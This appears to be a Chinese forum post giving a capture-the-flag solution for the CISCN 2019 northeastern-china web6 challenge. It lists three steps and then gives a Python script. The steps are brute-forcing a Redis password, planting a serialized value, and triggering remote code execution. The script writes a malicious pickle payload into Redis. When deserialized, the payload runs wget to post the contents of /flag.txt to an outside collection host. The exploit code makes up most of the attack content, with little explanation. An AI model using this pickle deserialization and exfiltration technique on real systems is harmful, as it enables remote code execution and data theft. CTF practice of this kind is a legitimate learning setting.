查看: 189|回复: 1

[Web] ciscn_2019_web_northeastern-china-web6

[复制链接]
发表于 2020-5-9 14:19:47 | 显示全部楼层 |阅读模式
1.爆破 redis 密码。

2.修改 redis 键值,将其设置为序列化之后的值。

3.访问,RCE,拿到 flag。

#!/usr/bin/python2.7
#coding:utf-8

import os
import pickle

from redis import StrictRedis

redis = StrictRedis(host='buuoj.cn', port=40000, db=0, password='chocolate')


class test(object):
    def __reduce__(self):
        return (os.system,
                ("wget 'http://xss.buuoj.cn/index.php?do=api&id=Fk3XC0' --post-data='location='`cat /flag.txt` -O-",))


a = test()
payload = pickle.dumps(a)

redis.set("glzjina12a226adf1a1cf0083d7459a72dc4f7", payload)


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

0

主题

11

帖子

0

精华

初级会员

Rank: 4

学币
15
荣耀
0
rank
20
违规
0

    发表于 2020-5-10 17:30:34 | 显示全部楼层
    顶贴|!顶贴|!顶贴!顶贴!
    学逆向论坛-免费的逆向学习论坛
    微信公众号
    快速回复 返回顶部 返回列表